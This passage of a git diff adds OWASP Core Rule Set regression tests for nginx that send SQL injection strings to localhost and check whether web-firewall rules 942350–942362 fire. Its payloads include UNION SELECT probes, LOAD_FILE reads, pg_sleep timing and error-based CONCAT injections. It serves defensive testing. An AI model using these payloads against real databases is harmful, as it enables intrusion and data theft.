text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # CREATE FUNCTION hello (s CHAR(20)) RETURNS CHAR(50) DETERMINISTIC RETURN CONCAT('Hello, ',s,'!'); + uri: "/?var=CREATE+FUNCTION+hello+%28s+CHAR%2820%29%29+RETURNS+CHAR%2850%29+DETERMINISTIC+RETURN+CONCAT%28%27Hello%2C+%27%2Cs%2C%27%21%27%29%3B" + version: HTTP/1.0 + output: + log_contains: id "942350" + - test_title: 942350-4 + desc: "Status Page Test - MySQL injection with ;truncate[xx" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?test=;truncate[xx" + version: HTTP/1.0 + output: + log_contains: id "942350" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942360.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942360.yaml new file mode 100644 index 00000000..138c9002 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942360.yaml @@ -0,0 +1,670 @@ +--- +meta: + author: "Christian S.J. Peron, Christoph Hansen, Franziska Buehler" + description: None + enabled: true + name: 942360.yaml +tests: + - test_title: 942360-1 + desc: "concatenated basic SQL injection and SQLLFI" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + # 23423 as "sdfsdfs" FROM table + data: "var=1234%20AS%20%22foobar%22%20FROM%20tablevar2=whatever" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-2 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "select Char(" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-3 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SELECT CHAR(" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-4 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SELECT GROUP_CONCAT(" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-5 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SELECT group_cOnCat(" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-6 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "select load_file(" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-7 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "` AS `edit_user_id` from" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-8 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=%60+REGEXP%20" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-9 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "` AS `OXTIMESTAMP` from" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-10 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "(load_file(" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-11 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "` AS `documentType` FROM" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-12 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SELECT load_file(" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-13 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "6 As\" from" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-14 + desc: GH issue 1580 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: ", aside from" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_title: 942360-15 + desc: GH issue 1605 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "a=/create" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_title: 942360-16 + desc: GH issue 1605 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "a=/CREATE TABLE Persons" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-17 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: " Delete (Trashcan)" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_title: 942360-18 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "5desc" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_title: 942360-19 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "34-delete" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_title: 942360-20 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: " update" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_title: 942360-21 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "/select-quote" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_title: 942360-22 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: " Update: After..." + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_title: 942360-23 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "\"desc\"" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_title: 942360-24 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "a=/load.php" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_title: 942360-25 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "a=/update-assets" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_title: 942360-26 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "bla blabla live update chart" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_title: 942360-27 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: ".select-gws-banana" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_title: 942360-28 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "blablabla. As evidence from the following blablabla" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_title: 942360-29 + desc: GH issue 1816 - Known false positive + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "||(SELECT(DBMS_LDAP.INIT('169.1.1.1',19))FROM(DUAL))/investigate" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_title: 942360-30 + desc: GH issue 1816 - Known false positive + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "'||(select(pg_sleep(15))where(true))||'/investigate" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_title: 942360-31 + desc: GH issue 1816 - Known false positive + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "UNION ALL SELECT NULL,NULL,CONCAT(CONCAT('qqkjq','mxTSrPILRz'),'qvxvq')-- sqCV" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_title: 942360-32 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "2020-03-01 UNION ALL SELECT CONCAT" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-33 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "x\"; SELECT LOAD_FILE('" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-34 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "-1 UNION SELECT null,123456,null,null,null,null--" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-35 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "(CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(112)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (6557=6557" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-36 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: ") UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-37 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,CONCAT('vbulletin','rce',@@version)" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-38 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "(SELECT 4440 FROM(SELECT COUNT(*),CONCAT(0x716b627a71,(SELECT (ELT(4440=4440,1))),0x7170716271,FLOOR" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-39 + desc: GH issue 1816 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + data: "2759399466.1534185336 -6863 union all select 1,1,1,1,1,1,1,1,1,CONCAT" + version: HTTP/1.0 + output: + log_contains: id "942360" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942361.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942361.yaml new file mode 100644 index 00000000..fdb36966 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942361.yaml @@ -0,0 +1,126 @@ +--- +meta: + author: "Christoph Hansen" + description: None + enabled: true + name: 942361.yaml +tests: + - test_title: 942361-1 + desc: "Detects basic SQL injection based on keyword alter or union" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "'alter a" + version: HTTP/1.0 + output: + log_contains: id "942361" + - test_title: 942361-2 + desc: "Detects basic SQL injection based on keyword alter or union" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "\" ALTER A" + version: HTTP/1.0 + output: + log_contains: id "942361" + - test_title: 942361-3 + desc: "Detects basic SQL injection based on keyword alter or union" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "'ALTER A" + version: HTTP/1.0 + output: + log_contains: id "942361" + - test_title: 942361-4 + desc: "Detects basic SQL injection based on keyword alter or union" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "' alter/" + version: HTTP/1.0 + output: + log_contains: id "942361" + - test_title: 942361-5 + desc: "Detects basic SQL injection based on keyword alter or union" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "\" UNION A" + version: HTTP/1.0 + output: + log_contains: id "942361" + - test_title: 942361-6 + desc: "Detects basic SQL injection based on keyword alter or union" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "'UNION A" + version: HTTP/1.0 + output: + log_contains: id "942361" + - test_title: 942361-7 + desc: "Detects basic SQL injection based on keyword alter or union" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "' union/" + version: HTTP/1.0 + output: + log_contains: id "942361" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942362.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942362.yaml new file mode 100644 index 00000000..e990aff5 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942362.yaml @@ -0,0 +1,551 @@ +--- +meta: + author: "Christian S.J. Peron, Christoph Hansen, Franziska Buehler" + description: None + enabled: true + name: 942362.yaml +tests: + - test_title: 942362-1 + desc: "concatenated basic SQL injection and SQLLFI" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + # 23423 as "sdfsdfs" FROM table + data: "var=1234%20AS%20%22foobar%22%20FROM%20tablevar2=whatever" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-2 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "select Char(" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-3 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SELECT CHAR(" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-4 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SELECT GROUP_CONCAT(" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-5 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SELECT group_cOnCat(" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-6 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: ") as cc FROM" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-7 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: ") AS orders FROM" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-8 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: ") AS `carrier_id` from" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-9 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "select load_file(" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-10 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: ") AS Role FROM" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-11 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "` AS `edit_user_id` from" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-12 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: ") AS val FROM" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-13 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=%60+REGEXP%20" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-14 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: ") AS 'Durchschnitt_Importzeit' FROM" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-15 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "` AS `OXTIMESTAMP` from" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-16 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: ") as col_0_0_ from" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-17 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: ") AS `count` FROM" + version: HTTP/1.0 + output: + log_contains: id "942362" + - test_title: 942362-18 